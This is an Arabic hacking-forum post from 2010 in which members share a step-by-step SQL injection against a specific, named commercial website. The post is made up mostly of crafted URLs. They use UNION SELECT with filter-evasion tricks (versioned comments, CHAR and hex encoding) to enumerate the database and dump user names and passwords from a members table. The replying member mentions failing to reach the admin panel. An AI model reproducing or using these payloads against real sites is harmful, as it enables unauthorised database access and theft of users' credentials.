الموضوع: العدد (3) من غرفة الحقن
عرض مشاركة واحدة
قديم 12-13-2010, 01:58 PM   رقم المشاركة : 93
معلومات العضو
إسلام العالم
 
إحصائية العضو





إسلام العالم غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
إسلام العالم is on a distinguished road
افتراضي

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة عبد الصمد
هلا اخي
تخطي مشكل معرفة الاصدار

كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5
/*!CONCAT
الموقع مانع كلمة concat
والتخطي ب


كود:
/*!CONCAT
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns
على فكرة الموقع مانع الامر group_ الاستعلام بlimit
فيه جدول واحد فقط
كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)
جدول اليوزر

كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+table_name=0x6d656d62657273+limit+1,1
الحقنة كاملة

كود:
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,UNHEX(HEX(/*!CONCAT(user_name,0x3a,id,0x3a,pass_word))) ,3,4,5+from+members
وللبحث عن شيخ القبيلة استعمل limit

أخي نفس النتيجة يلي طلعت معي

بس ما دخل على لوحة الأدمن